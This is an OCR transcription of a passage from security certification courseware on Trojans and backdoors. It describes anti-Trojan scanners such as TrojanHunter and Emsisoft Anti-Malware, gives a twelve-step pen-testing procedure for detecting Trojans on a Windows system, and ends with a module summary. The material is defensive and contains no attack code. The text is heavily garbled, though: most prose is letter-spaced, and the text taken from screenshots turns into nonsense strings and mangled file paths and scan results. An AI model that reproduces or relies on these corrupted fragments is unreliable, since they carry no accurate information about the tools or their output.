P r io r t o th is , w e h a v e d iscu ss e d v a r io u s c o u n t e r m e a s u r e s t h a t o f f e r p r o t e c t i o n t o y o u r
c o m p u t e r s y s te m a n d t h e i n f o r m a t i o n s t o r e d o n it a g a in s t v a r io u s m a l w a r e su ch as T r o j a n s a n d
b a c k d o o r s . In a d d i t i o n t o th e s e , t h e r e is a n t i - T r o j a n s o f t w a r e t h a t can p r o t e c t y o u r c o m p u t e r
s y s te m s a n d o t h e r i n f o r m a t i o n assets a g a in s t T r o ja n s a n d b a c k d o o rs . A n t i - T r o ja n s o f t w a r e
d ea ls w i t h r e m o v i n g o r d e a c t i v a t i n g m a l w a r e .
T r o j a n C o n c e p ts
C ou n te rm e a su re s
,‫• נ‬
T ro ja n s In fe c tio n
A n ti- T r o ja n S o ftw a re
s —
v‫— ׳‬
f ‫י‬
T ro ja n D e te c tio n
^
P e n e t r a t i o n T e s t in g
T his s e c tio n lists a n d d e s c r ib e s v a r io u s a n t i - T r o ja n s o f t w a r e p r o g r a m s .
M o d u le 0 6 P ag e 9 93
A n t i - T r o ja n
T r o j a n H
S o f t w a r e :
CEH
u n t e r
TrojanHunter is an advanced m alw are scanner that detects all sorts of m alware such as Trojans,
spyware, adware, and dialers
' -L eT
T rojanH u nter
M e m o ry scanning for
File
detecting any m odified variant of
a particular build o f a Trojan
View
\
FjlEcar
Seen
J00I5
\
QjckScan
x
Help
Q
Update
*
6uy TrojanHunter Now - Clcfc Here!
Bat
Registry scanning for detecting traces
o f Trojans in the registry
•i U) CPCb
Inifile scanning for detecting traces
o f Trojans in configuration files
^Char...
O
W
Clow
F&na va» ‫ ו׳‬file: CAJser3\AdrhVkaoOeto\.K0i\TOT0Wx.cxcAJ0K.fyv1hwyb (Aocnt.2989)
P0J 10 VOtdn *fe: C:V/rtJowstf ysWOM64y1‫׳‬CAFEE. EKE (RIshvare.TVtyPrcwv. IOC)
T rojanH unter Guard for resident
m em ory scanning - detect any Trojans
if they m anage to start up
http ://www. trojanhunter. com
C o p y rig h t © b y EG-CM HCil. A ll R ights R eserved. R e p ro d u c tio n Is S tric tly P ro h ib ite d .
A n ti- T r o ja n
S o ftw a re : T r o ja n H u n te r
S o u rc e : h t t p : / / w w w . t r o j a n h u n t e r . c o m
T r o j a n H u n t e r is a m a l w a r e s c a n n e r t h a t d e t e c t s a n d r e m o v e s all s o rts o f m a l w a r e , such as
T ro ja n s , s p y w a r e , a d w a r e , a n d d ia le rs , f r o m y o u r c o m p u t e r .
S o m e o f T r o j a n H u n t e r ' s f e a t u r e s in c lu d e :
0
H ig h -s p e e d file scan e n g in e c a p a b le o f d e t e c t i n g m o d i f i e d T r o j a n s
0
M e m o r y s c a n n in g f o r d e t e c t i n g a n y m o d i f i e d v a r i a n t o f a p a r t i c u l a r b u ild o f a T r o ja n
0
R e g is try s c a n n in g f o r d e t e c t i n g tr a c e s o f T r o ja n s in t h e r e g is t r y
0
In ifile s c a n n in g f o r d e t e c t i n g tr a c e s o f T r o ja n s in c o n f i g u r a t i o n files
0
P o r t s c a n n in g f o r d e t e c t i n g o p e n T r o ja n p o r ts
0
T h e A d v a n c e d T r o ja n A n a ly z e r, an e x c lu s iv e f e a t u r e o f T r o j a n H u n t e r , is a b le
to fin d
w h o l e classes o f T r o ja n s u sin g a d v a n c e d s c a n n in g t e c h n i q u e s
0
T r o j a n H u n t e r G u a r d f o r r e s i d e n t m e m o r y s c a n n in g - d e t e c t a n y T ro ja n s if t h e y m a n a g e
to s ta rt up
0
M o d u le 0 6
L iv e U p d a te u t i l i t y f o r e f f o r t l e s s r u le s e t u p d a t i n g via t h e I n t e r n e t
Page 994
9
Process list g iv in g d e ta ils a b o u t e v e r y r u n n i n g p ro c e s s o n t h e s y s te m , in c lu d in g t h e p a th
t o t h e a c tu a l e x e c u t a b l e file
0
A c c u r a t e r e m o v a l o f all d e t e c t e d T ro ja n s - e v e n if t h e y a re r u n n i n g o r i f t h e T r o ja n has
i n je c te d it s e lf i n t o a n o t h e r p ro c e s s
T ro ja n H u n te r
File
View
Full Scan
Scan
T ools
Quick Scan
L
j l
J
H elp
0
Update
■ h
Exit
Objects scanned:
147791
Trojans found:
a Buy TrojanHunter Now - Click Here!
2
‫ >י‬, Clean.
Close
(U) Found trojan file: C:\Users\Admin\AppDataV-0cal\TempVjpx.exeAJpx.fyvzhwyb (Agent.2989)
1 0 Found trojan file: C:\W1ndows\$ysWOW64V>1CAFEE.EXE (Rjskware.TinyProxy. 100)
FIGURE 6 .6 5 : T r o ja n H u n te r A n ti-T ro ja n S o ftw a re
M o d u le 0 6 P ag e 9 9 5
A n t i - M
a lw
S o f t w a r e :
E m
s is o f t
CEH
a r e
E m s is o ft A n ti-M a lw a re p r o v id e s
Emsisoft A N T I - M A L W A R E
PC p r o t e c t i o n a g a in s t v ir u s e s ,
T ro ja n s , s p y w a r e , a d w a r e , w o r m s ,
b o ts , k e y lo g g e rs , a n d r o o tk its
t=J
SCANCOMPUTER
T w o c o m b in e d s c a n n e r s fo r
Scanned objects
c le a n in g : A n ti-V iru s a n d A nti-
*97-163
Dctccted objects:
M a lw a re
Oiagntnn
T h r e e g u a r d s a g a in s t n e w
in f e c tio n s : file g u a r d , b e h a v io r
b lo c k e r, a n d s u r f p r o te c ti o n
317
Reno/eb objects:
0
Detaih
62 registry keys ‫ ־‬ircdium ri^<
a
Scanning: S a r'ro h c d ‫־‬
fO
‫&י‬
S
J detected bcaticr?..
B I r a ic J t a u a tn r lC f 5J (A)
Gt We* el detected bcaticrs..
U T r a ic J t a m t r e J iM a iY r S vstan P m tn ifd
£ Vicr J d c ‫־‬x :*dlo^*Jcr 3..
I d Troiaa.Gcncnu5515373 TO)
C \ 1zn Jde'.e.tedk>.3X> 5..
I d YD5.TroiaikNuoUD (0)
(E \tzr Jd c'.c. r d b .a X f S..
I d JSJWCC(B)
Mjtptctottc M *t Have been detected during the
1
16 regstry keys ‫ ־‬mrdium rWc
I S ca n fin is h e d !
I f there *vjc beer any Malware
found on vour PC. rwi tan
obtain rare rrfbraiatKM on **
obout eoch OctcctrC Malnare.
Cld< the 1M11■o f tie detected
nalwarc to
$rc 0c»<np0y‫־‬
In a new Inow** wndorv.
2 files ‫ ׳‬highrisk
2 fifes ■
high risk
2 fits •Highrisk
Cltk on Vicv» 01 detected
locittorV ‫־‬.o get a Kt o ' «1 kxjtd
eocroorcnts !hat arc •cotcc »
the Mfll^rtip name.
01
Cebct ! objects you /ran: to
quarannrw
!hen drfc ê
T»1irt'M trr «Her*eH rMerN"
© 2a03-2D:2ErKB=#r
—
ASout •ftc £0tw a‫־‬e
http://www.emsisoft.com
C o p y rig h t © b y EG-COBnci!. A ll R ights R eserved. R e p ro d u c tio n is S tric tly P ro h ib ite d .
‫ץ‬
A n ti- T r o ja n
S o ftw a re : E m s is o ft A n ti- M a lw a r e
S o u rc e : h t t p : / / w w w . e m s i s o f t . c o m
E m s is o ft A n t i - M a l w a r e p r o v id e s r e lia b le p r o t e c t i o n o f y o u r s y s t e m a g a in s t v a r io u s t h r e a t s such
as v iru s e s , T ro ja n s ,
s p yw a re ,
adw are,
w orm s,
b o ts ,
k e y lo g g e rs ,
a nd
ro o tk its .
It has t w o
c o m b in e d s c a n n e rs ( a n t iv ir u s a nd a n t i - m a l w a r e ) f o r c le a n in g in f e c t i o n a nd t h r e e g u a rd s a g a in s t
n e w in f e c t io n s : f ile g u a r d , b e h a v i o r b lo c k e r , a n d s u r f p r o t e c t i o n .
M o d u le 0 6 P ag e 9 9 6
E m s is o ft
ANTI-MALWARE
SCAN COMPUTER
&
/
ijLigS
S canned o b je c ts :
r
4 9 7 48 3
D e t e c t e d o b je c t s :
317
R e m oved o b je c ts :
0
\
S e a n n i n g : Scan fin is h e d !
D e t a ils
D ia g n o s is
P I T r a c e . R e q is t r v - W in d o w s P a s s w o r d ( A )
9
62 registry keys - medium risk
A
View all d e te c te d lo c a tio n s ...
p i T r a c e .R e a is t r v . L C P 5 .0 f A )
S c a n fin is h e d !
16 registry keys - medium risk
f fl View all d e te c te d lo c a tio n s ...
HTI T r a c e . R e a is t r v . P r o a c t iv e S v s t e m P a s s w o r d Re<15
reoistrv kevs - medium risk
I f th e re h a s b ee n a n y M alw are
fo u n d on y o u r PC, yo u can
o b ta in m ore in fo rm a tio n online
a b o u t each d e te c te d M a lw a re .
Click th e nam e o f th e d e te c te d
m a lw a re to v ie w th e d escriptio n
in a n e w b ro w s e r w in d ow .
5) View all d e te c te d lo c a tio n s ...
|w‫ | ׳‬T r o ia n . G e n e r ic . 5 5 1 5 3 7 3 (B )
2 files - high risk
b
0
V B S . T r o ia n . N o o b . B fB )
2 files - high risk
0
3&AXCCXB)
2 files - high risk
V
Clide on "View all d e te c te d
lo ca tio n s’ to g e t a lis t o f all fo u n d
co m p on en ts th a t a re re la te d to
th e M a lw a re nam e.
Suspicious files have been detected during the scan.
S elect all o b je c ts yo u w a n t to
q u a ra n tin e a n d th e n d idc th e
O i iflra n tin p v I p r tp H n h ip r f c '
©
2 0 0 3 -2 0 1 2 E m sisoft
A b o u t this s o ftw a re
FIGURE 6 .6 6 : E m siso ft A n ti- M a lw a re
M o d u le 0 6 P ag e 9 9 7
A n ti-T ro ja n Softwares
Anti-Trojan Shield (ATS)
a□□
p H
SPYWAREfighter
http://www.atshield.com
http://www.spamfighter.com
------ ‫ד‬-
Spyware Doctor
Anti Trojan Elite
http://www.pctools.com
http://www.remove-trojan.com
V'
Anti Malware BOCIean
SUPERAntiSpyware
A
http://www.comodo.com
-
http://www.superantispyware.com
Anti Hacker
‫ח ך‬
[n n |
http://www.hide-my-ip.com
H
http://www.paretologic.com
CEH
Trojan Remover
http://www.simplysup.com
XoftSpySE
Twister Antivirus
http://www.filseclab.com
C o p y rig h t © b y E G -C (a n cil. A ll R ights R eserved. R e p ro d u c tio n Is S tric tly P ro h ib ite d .
*
A n ti- T r o ja n
S o ftw a re
s o ftw a re
p r o v id e s
p ro te c tio n
to
your
c o m p u te r
s ys te m
and
th e
i n f o r m a t i o n s t o r e d o n it by b lo c k in g v a r io u s m a lic io u s t h r e a t s such as T ro ja n s , w o r m s , viru s e s ,
b a c k d o o r s , m a lic io u s A c t iv e X c o n tr o ls , a n d Java a p p le t s t o e n t e r y o u r s y s te m . A f e w o f t h e a n t i T r o ja n s o f t w a r e p r o g r a m s t h a t a re used f o r t h e p u r p o s e o f k illin g m a l w a r e a re lis te d as f o l lo w s :
0
A n t i - T r o ja n Shield (ATS) a v a ila b le a t h t t p : / / w w w . a t s h i e l d . c o m
0
S p y w a r e D o c t o r a v a ila b le a t h t t p : / / w w w . p c t o o l s . c o m
0
A n t i M a l w a r e BOCIean a v a ila b le a t h t t p : / / w w w . c o m o d o . c o m
0
A n t i H a c k e r a v a ila b le a t h t t p : / / w w w . h i d e - m v - i p . c o m
0
XoftS pyS E a v a ila b le a t h t t p : / / w w w . p a r e t o l o g i c . c o m
0
S P Y W A R E fig h te r a v a ila b le a t h t t p : / / w w w . s p a m f i g h t e r . c o m
0
A n ti T r o ja n Elite a v a ila b le a t h t t p : / / w w w . r e m o v e - t r o i a n . c o m
0
S U P E R A n tiS p y w a re a v a ila b le a t h t t p : / / w w w . s u p e r a n t i s p y w a r e . c o m
0
T r o ia n R e m o v e r a v a ila b le a t h t t p : / / w w w . s i m p l y s u p . c o m
0
T w is t e r A n t i v i r u s a v a ila b le a t h t t p : / / w w w . f i l s e c l a b . c o m
M o d u le 0 6 P ag e 9 9 8
M o d u le Flow
EH
T ro ja n C o n c e p ts
T ro ja n I n fe c tio n
**S
C ou nterm e asu res
A
**r
/
I
T ro ja n D e t e c tio n
C o p y rig h t © b y E G -G *ancil. A ll R ights R eserved. R e p ro d u c tio n is S tric tly P ro h ib ite d .
M o d u le
F lo w
As a p e n e t r a t i o n t e s t e r , y o u s h o u ld f o l l o w t h e s a m e s tr a t e g ie s as t h a t o f an a t t a c k e r
t o t e s t y o u r n e t w o r k o r s y s te m a g a in s t T r o j a n a n d b a c k d o o r a t t a c k s . You s h o u ld p e r f o r m all t h e
a v a ila b le a t t a c k in g t e c h n i q u e s in c lu d in g t h e n e w l y e m e r g e d a t t a c k in g t e c h n i q u e s . T his a llo w s
y o u t o f i g u r e o u t t h e l o o p h o l e s o r v u l n e r a b i l it ie s in t h e t a r g e t o r g a n i z a t i o n 's s e c u r ity . If y o u fin d
a n y v u ln e r a b i l it ie s o r lo o p h o le s , y o u
s h o u ld
s u g g e s t c o u n t e r m e a s u r e s t h a t can m a k e t h e
o r g a n i z a t i o n 's s e c u r it y b e t t e r a n d s t r o n g e r .
T r o j a n C o n c e p ts
C ou n te rm e a su re s
—
,‫• נ‬
T ro ja n s In fe c tio n
!/—
V‫— ׳‬
‫י ץ‬
T ro ja n D e te c tio n
M o d u le 0 6 P ag e 9 9 9
|||||r
A n ti-T ro ja n S o ftw a re
P e n e t r a t i o n T e s t in g
P e n
T e s t i n g
f o r T r o j a n s
a n d
CEH
B a c k d o o r s
U se to o ls su ch as
0
T C P V iew an d
C u rrP o rts
Scan th e sy stem fo r o p e n p o r ts ,
ru n n in g p ro c e s s e s , reg istry e n trie s ,
d ev ice d riv e rs a n d serv ic es
0
If an y su sp icio u s p o rt, p ro c e ss,
reg istry en try , d e v ic e d riv e r o r
S c a n fo r r u n n in g
U se to o ls su ch a s
P ro c e s s e s
W h a t's R u n n in g
s erv ic e is d isc o v e re d , ch e c k th e
a s s o c ia te d e x e c u ta b le files
0
availab le, a n d In te rn e t
U s e t o o ls s u c h a s
S c a n fo r r e g i s t r y
j v l 6 P o w e r T o o ls 2 0 1 2 a n d
e n trie s
PC T o o ls R e g is t r y M e c h a n ic
S c a n fo r d e v ic e
d r iv e r s in s ta lle d
D riv erV iew a n d
o n th e c o m p u te r
D river D e te c tiv e
S c a n fo r W i n d o w s
S rv M a n a n d S erviW in
s e r v ic e s
C ollect m o re in fo rm a tio n a b o u t
th e s e fro m p u b lish e r's w e b s ite s , if
0
C heck if th e o p e n p o rts a r e k n o w n
to b e o p e n e d by T ro jan s in wild
P e n
T e s tin g
fo r T ro ja n s
a n d
B a c k d o o rs
S te p 1: Scan f o r o p e n p o r t s
O p e n p o r ts a re t h e p r i m a r y s o u r c e s t o la u n c h a tta c k s . T h e r e f o r e , in an a t t e m p t t o m a k e y o u r
n e t w o r k s e c u re by c o n d u c t i n g p e n t e s tin g , y o u s h o u ld f i n d t h e o p e n p o r ts a n d p r o t e c t t h e m .
You can f i n d t h e u n n e c e s s a r y o p e n p o r t s by s c a n n in g f o r o p e n p o r ts . For th is p u r p o s e , y o u can
use t h e t o o l s such as T C P V ie w a n d C u r r P o r ts .
S te p 2: Scan f o r r u n n i n g p ro c e s s e s
M o s t T r o ja n s d o n ' t r e q u i r e t h e u se r t o s t a r t t h e p ro c e s s . T h e y s t a r t a u t o m a t i c a l l y a n d d o n ' t
e v e n n o t i f y t h e user. T his k in d o f T r o ja n can be d e t e c t e d b y s c a n n in g f o r r u n n i n g p ro c e s s e s . In
o r d e r t o scan f o r r u n n i n g p ro c esse s, y o u can use t o o l s such as W h a t 's R u n n in g , w h i c h scans
y o u r s y s te m a n d lists all c u r r e n t l y a c tiv e p r o g r a m s , p ro cesse s, se rvices, m o d u le s , a n d n e t w o r k
c o n n e c t i o n s . It a lso in c lu d e s sp e cia l a re as t o d is p la y s t a r t u p p r o g r a m s .
S te p 3: Scan f o r r e g i s t r y e n t r i e s
A f e w T ro ja n s ru n in t h e b a c k g r o u n d w i t h o u t a n y n o t i f i c a t i o n t o t h e s y s te m 's user. If y o u w a n t
t o t e s t f o r su ch T ro ja n s , t h e n y o u s h o u ld scan f o r r e g is t r y e n tr ie s . This can be d o n e w i t h t h e
h e lp o f to o l s such as JV P o w e r T o o ls a n d PC T o o ls R e g is try M e c h a n ic .
M o d u le 0 6 P ag e 1 0 0 0
S te p 4: Scan f o r d e v ic e d r i v e r s i n s t a l l e d o n t h e c o m p u t e r
In o r d e r t o c o n t r o l t h e h a r d w a r e , m o s t m o d e r n OSes use t h e i r o w n d e v ic e d riv e r s . A t t a c k e r s
can ta k e a d v a n ta g e o f t h is s i t u a t i o n t o s p re a d T r o j a n s a n d b a c k d o o r s t h r o u g h d e v ic e d r i v e r
file s. T r o ja n s s p re a d t h r o u g h d e v ic e d r iv e r s in f e c t t h e d e v ic e d r i v e r file s a n d o t h e r p ro cesse s.
S te p 5: Scan f o r W i n d o w s s e rv ic e s
If y o u f i n d a n y o f t h e W i n d o w s s e rv ic e s s u s p ic io u s , t h e n c h e c k t h e a s s o c ia te d e x e c u ta b le files.
T o scan W i n d o w s services, y o u can use t h e t o o l s such as S r v M a n a n d S e r v iW in .
M o d u le 0 6 P ag e 1001
S te p 6: Scan f o r s t a r t u p p r o g r a m s
S o m e T r o ja n s ru n a u t o m a t i c a l l y w h e n y o u s t a r t W i n d o w s . T h e r e f o r e , scan f o r S t a r t u p p r o g r a m s
u sin g t o o l s su ch as S ta r te r, S e c u r ity A u t o R u n , a n d A u t o r u n s a n d c h e c k t h e lis te d s t a r t u p
p ro g ra m s
and
d e te rm in e
if all t h e
p rogram s
in t h e
list can
be
re c o g n iz e d
w ith
known
f u n c t io n a l it ie s .
S te p 7: Scan f o r fi l e s a n d f o l d e r s
T h e easy w a y f o r an a t t a c k e r t o h a c k a s y s te m is w i t h t h e use o f file s e m b e d d e d w i t h T r o ja n
p a cka ge s. F ire w a lls , IDSes, a nd o t h e r s e c u r it y m e c h a n is m s m a y fa il t o p r e v e n t t h is k in d o f
a tta c k . T h e r e f o r e , y o u n e e d t o scan all file s a n d f o l d e r s f o r T r o j a n s a n d b a c k d o o r s . You can scan
file s a n d f o l d e r s u sin g t o o l s such as FCIV, TRIPWIRE, SIGVERIF, F astSum , a n d W i n M D 5 .
S te p 8: Scan f o r n e t w o r k a c t i v i t i e s
N e t w o r k a c tiv it ie s such as u p lo a d o f b u l k fi l e s o r u n u s u a lly h ig h t r a f f i c g o in g t o a p a r t i c u l a r w e b
a d d re s s m a y s o m e t i m e s r e p r e s e n t a sign o f T r o ja n . You s h o u ld scan f o r such n e t w o r k a c t i v it ie s .
T o o ls such as Capsa N e t w o r k A n a ly z e r can be used f o r t h is p u r p o s e .
M o d u le 0 6 P ag e 1002
S te p 9: Scan f o r m o d i f i c a t i o n t o OS file s
C he ck t h e
c r itic a l OS file
m o d ific a tio n
o r m a n ip u la tio n
u sin g t o o l s such
as TR IP W IR E o r
m a n u a l ly c o m p a r e hash v a lu e s if y o u h a v e a b a c k u p c o p y .
S te p 10: R un T r o j a n S c a n n e r t o d e t e c t T r o j a n s
T r o ja n s c a n n e rs such as T r o j a n H u n t e r a n d E m s is o f t A n t i - M a l w a r e a re r e a d ily a v a ila b le in t h e
m a r k e t . You can in s ta ll a n d ru n t h o s e T r o ja n s c a n n e rs t o d e t e c t T ro ja n s o n y o u r s y s te m .
M o d u le 0 6 P ag e 1003
P e n
T e s t i n g
B a c k d o o r s
f o r
T r o j a n s
(C o n t’d)
0
If T r o ja n s
D o c u m e n t all t h e
••>
fin d in g s
a n d
NO
a re
d e te c te d ?
CEH
D o c u m e n t all y o u r fin d in g s in
p rev io u s ste p s ; it h e lp s in
d e te rm in in g th e n ex t ac tio n if
A.
T rojans a r e id e n tified in th e
sy stem
YES
0
I s o la te t h e m a c h in e
fro m n e tw o rk
Is o la te in fe c te d s y s te m fro m
th e n e tw o rk im m e d ia te ly to
p re v e n t f u r th e r in fe ctio n
9
S an itize t h e c o m p le te s y ste m
fo r T rojans u sin g a n u p d a te d
an ti-v iru s
s o lu tio n t o c le a n
T ro ja n s
P e n
T e s tin g
fo r T ro ja n s
a n d
B a c k d o o rs
( C o n t’d )
S te p 11: D o c u m e n t a ll t h e f i n d i n g s
O n c e y o u c o n d u c t all p o s s ib le te s ts t o f i n d t h e T r o ja n s , d o c u m e n t all t h e fi n d i n g s t h a t y o u
o b t a i n a t e ach t e s t f o r a n a ly s is a n d c h e c k if t h e r e is a n y sign o f a T r o ja n .
S te p 12: I s o la te t h e m a c h i n e f r o m t h e n e t w o r k
W h e n y o u fin d a T r o j a n o n a m a c h in e , y o u s h o u ld is o la te t h e m a c h in e i m m e d i a t e l y f r o m t h e
n e t w o r k b e f o r e it ta k e s c o n t r o l o v e r o t h e r s y s te m s in t h e n e t w o r k . C he ck w h e t h e r t h e a n t iv ir u s
s o f t w a r e is u p d a t e d o r n o t.
If t h e a n t i v i r u s is n o t u p d a t e d , t h e n u p d a t e it a n d t h e n r u n i t t o scan t h e s y s te m . If t h e a n t iv ir u s
is a lr e a d y u p d a t e d , t h e n f i n d o t h e r a n t i v i r u s s o lu t i o n s t o c le a n T r o ja n s .
M o d u le 0 6 P ag e 1004
M o d u le S u m m a ry
‫ב‬
CEH
T r o ja n s a r e m a lic io u s p ie c e s o f c o d e t h a t c a r r y c r a c k e r s o f t w a r e t o
a t a r g e t s y s te m
□
They are used prim arily to gain and retain access on the target system
□
They often reside deep in the system and make registry changes that allow them to
meet their purpose as a rem ote adm inistration tool
□
Popular Trojans include MoSucker, Rem oteByM ail, Illusion Bot, and Zeus
□
Aw areness and preventive measures are the best defences against Trojans
□
Using anti-Trojan tools such as TrojanHunter and Emsisoft A nti-M alw are to detect
and elim inate Trojans
M o d u le
S u m m a ry
9
T ro ja n s a re m a lic io u s p ie c e s o f c o d e t h a t c a r r y c r a c k e r s o f t w a r e t o a t a r g e t s y s te m .
©
T h e y a re used p r i m a r i l y t o g ain a n d r e ta in access o n t h e t a r g e t s y s te m .
9
T h e y o f t e n re s id e d e e p in t h e s y s te m a n d m a k e r e g is t r y c h a n g e s t h a t a l l o w t h e m t o
m e e t t h e i r p u r p o s e as a r e m o t e a d m i n i s t r a t i o n t o o l .
0
P o p u la r T r o ja n s in c lu d e M o S u c k e r , R e m o t e B y M a i l, Illu s io n Bo t, a nd Zeus.
0
A w a r e n e s s a n d p r e v e n t i v e m e a s u r e s a re t h e b e s t d e fe n c e s a g a in s t T ro ja n s .
9
U sing a n t i - T r o ja n t o o l s such as T r o j a n H u n t e r a n d E m s is o ft A n t i - M a l w a r e t o d e t e c t a nd
e l i m i n a t e T ro ja n s .
M o d u le 0 6 P ag e 1005

Trojans and Backdoors

Transcription

Similar documents

List of Successful Examinees